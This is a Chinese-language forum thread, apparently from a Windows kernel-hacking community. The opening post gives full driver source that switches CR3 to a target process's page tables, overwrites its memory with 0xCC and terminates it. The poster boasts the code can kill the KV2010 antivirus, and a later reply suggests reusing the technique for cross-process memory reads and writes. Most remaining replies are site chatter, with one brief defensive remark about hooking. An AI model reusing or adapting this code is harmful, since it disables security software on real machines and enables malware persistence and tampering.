找回密码
 加入我们

QQ登录

只需一步,快速开始

搜索
查看: 14952|回复: 14

[半原创]另类内存清零 - HwlPVASE

 火... [复制链接]

38

主题

199

回帖

2

精华

钻石会员

积分
3408
发表于 2010-3-27 14:41:24 | 显示全部楼层 |阅读模式
本帖最后由 HoviDelphic 于 2010-4-10 23:10 编辑

貌似有不少人关注我的“另类内存清零”,其实原理很简单:
获得待结束进程的EPROCESS->获取EPROCESS+0x18的值(页目录值)->将页目录的值放到cr3->内存清零->恢复cr3的值。
实现的代码:

  1. NTSTATUS HwlPVASE( PEPROCESS ptrEProcess )
  2. {
  3.     ULONG ulPDT=0,ulOldCr3=0,vAddr=0;
  4.     HANDLE hProcess=0;
  5.     NTSTATUS st;
  6.     //HdAttachProces
  7.     if ( NT_SUCCESS(MmIsAddressValid((PVOID)((ULONG)ptrEProcess+0x18))) )
  8.     {
  9.         ulPDT=*(PULONG)((ULONG)ptrEProcess+0x18);
  10.     }
  11.     else
  12.     {
  13.         return STATUS_UNSUCCESSFUL;
  14.     }
  15.     _asm cli;
  16.     _asm
  17.     {
  18.         mov eax, cr3;
  19.         mov ulOldCr3, eax;
  20.         mov eax, ulPDT;
  21.         mov cr3, eax;
  22.         sti;
  23.     }
  24.     //P.V.A.S.E
  25.     for(vAddr=0;vAddr<=0x2000000;vAddr+=0x1000)
  26.     {  
  27.         if(MmIsAddressValid((PVOID)vAddr))
  28.         {
  29.             _try
  30.             {
  31.                 ProbeForWrite((PVOID)vAddr,PAGE_SIZE,PAGE_SIZE);
  32.                 memset((PVOID)vAddr,0xCC,PAGE_SIZE);
  33.             }
  34.             _except(1)
  35.             {
  36.                 continue;
  37.             }
  38.         }
  39.     }
  40.     //HdDetachProces
  41.     _asm
  42.     {
  43.         cli;
  44.         mov eax, ulOldCr3;
  45.         mov cr3, eax;
  46.     }
  47.     _asm sti;
  48.     //Test Kill
  49.     st=ObOpenObjectByPointer(ptrEProcess,0,0,0,0,0,&hProcess) ;
  50.     if NT_SUCCESS(st)
  51.     {
  52.         ZwTerminateProcess(hProcess,0);
  53.         ZwClose(hProcess);
  54.     }
  55.     return STATUS_SUCCESS;
  56. }
复制代码

此代码在Windows XP和Windows 7中测试通过,可以秒杀KV2010(不过要稍微修改一下代码)

无敌内存清零.rar

92.72 KB, 阅读权限: 11, 下载次数: 21

售价: 10 水晶币  [记录]

src

如果附件无法下载,请点击这里

9

主题

210

回帖

0

精华

初来乍到

积分
904
发表于 2010-3-27 15:06:56 | 显示全部楼层
话说前段时间  论坛怎么进不了!!!

6

主题

196

回帖

0

精华

铜牌会员

菜鸟

积分
52
发表于 2010-3-27 16:49:46 | 显示全部楼层
MmIsAddressValid 呵呵

275

主题

3017

回帖

1

精华

管理员

嗷嗷叫的老马

积分
17064

论坛牛人贡献奖关注奖最佳版主进步奖人气王疯狂作品奖精英奖赞助论坛勋章乐于助人勋章

QQ
发表于 2010-3-27 18:13:25 | 显示全部楼层
话说前段时间  论坛怎么进不了!!!
oopww 发表于 2010-3-27 15:06


同服务器有个站点有不和谐内容,然后整个服务器都被封了80端口......

伟大的D比起以前要好得多了,至少这次没有直接搬服务器.....

同时谢谢关注
我就是嗷嗷叫的老马了......

857

主题

2632

回帖

2

精华

管理员

此生无悔入华夏,  长居日耳曼尼亚。  

积分
36130
发表于 2010-3-27 19:58:08 | 显示全部楼层
回复 4# 马大哈


    那你怎么不更换服务器?

6

主题

196

回帖

0

精华

铜牌会员

菜鸟

积分
52
发表于 2010-3-28 19:08:38 | 显示全部楼层
if ( NT_SUCCESS(MmIsAddressValid((PVOID)((ULONG)ptrEProcess+0x18))) )这里用Hook MmIsAddressVaild就防住了
拦截这种东西只能Hook RtlCopyMemory但是判断PsGetCurrentProcess怎们判断呢?

在IOCTL中必须要在本进程中RtlCopyMemory啊 这样怎么办呢?

275

主题

3017

回帖

1

精华

管理员

嗷嗷叫的老马

积分
17064

论坛牛人贡献奖关注奖最佳版主进步奖人气王疯狂作品奖精英奖赞助论坛勋章乐于助人勋章

QQ
发表于 2010-3-30 20:40:46 | 显示全部楼层
回复  马大哈


    那你怎么不更换服务器?
Tesla.Angela 发表于 2010-3-27 19:58


    这与换不换服务器有关,与运气有关....

只是运气不好,同服务器有别的站有不和谐内容而已....

我都在怀疑是不是最近RP降低的原因-_-b
我就是嗷嗷叫的老马了......

本网站最菜的人 该用户已被删除
发表于 2010-4-3 22:31:35 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽

38

主题

199

回帖

2

精华

钻石会员

积分
3408
 楼主| 发表于 2010-4-3 23:40:37 | 显示全部楼层
用这个东西来杀进程真是太不值得了,用来搞个Read/WriteProcMem才能真正发挥出它的价值。
如果附件无法下载,请点击这里

9

主题

210

回帖

0

精华

初来乍到

积分
904
发表于 2010-4-6 14:59:49 | 显示全部楼层
最近打开网站好慢啊!??!?!!

76

主题

375

回帖

0

精华

铜牌会员

积分
231
发表于 2010-4-6 23:59:15 | 显示全部楼层
最近打开网站好慢啊!??!?!!
oopww 发表于 2010-4-6 14:59



    Ping了一下,IP是61.158.138.152,网通的啊?电信访问肯定会慢的.

0

主题

8

回帖

0

精华

初来乍到

积分
11
发表于 2011-2-13 14:28:42 | 显示全部楼层
用來讀寫內存好點

275

主题

3017

回帖

1

精华

管理员

嗷嗷叫的老马

积分
17064

论坛牛人贡献奖关注奖最佳版主进步奖人气王疯狂作品奖精英奖赞助论坛勋章乐于助人勋章

QQ
发表于 2011-2-13 16:34:34 | 显示全部楼层
回复 everyone 的帖子

这个主机是双线主机,应该会自动切换IP的才对啊......我用了智能DNS的...
我就是嗷嗷叫的老马了......

0

主题

30

回帖

0

精华

铜牌会员

积分
225
发表于 2012-4-27 23:40:27 | 显示全部楼层
话说楼主很猥琐,喜欢这类变态的方式,原来楼主就是黑防上顶顶大名的胡文亮啊,崇拜崇拜,努力学好技术,希望也能在黑防上发表文章

857

主题

2632

回帖

2

精华

管理员

此生无悔入华夏,  长居日耳曼尼亚。  

积分
36130
发表于 2012-4-28 23:20:57 | 显示全部楼层
chenmo不行 发表于 2012-4-27 23:40
话说楼主很猥琐,喜欢这类变态的方式,原来楼主就是黑防上顶顶大名的胡文亮啊,崇拜崇拜,努力学好技术,希 ...

HoviDelphic是胡文亮以前的网名,现在的网名是Tesla.Angela。
您需要登录后才可以回帖 登录 | 加入我们

本版积分规则

快速回复 返回顶部 返回列表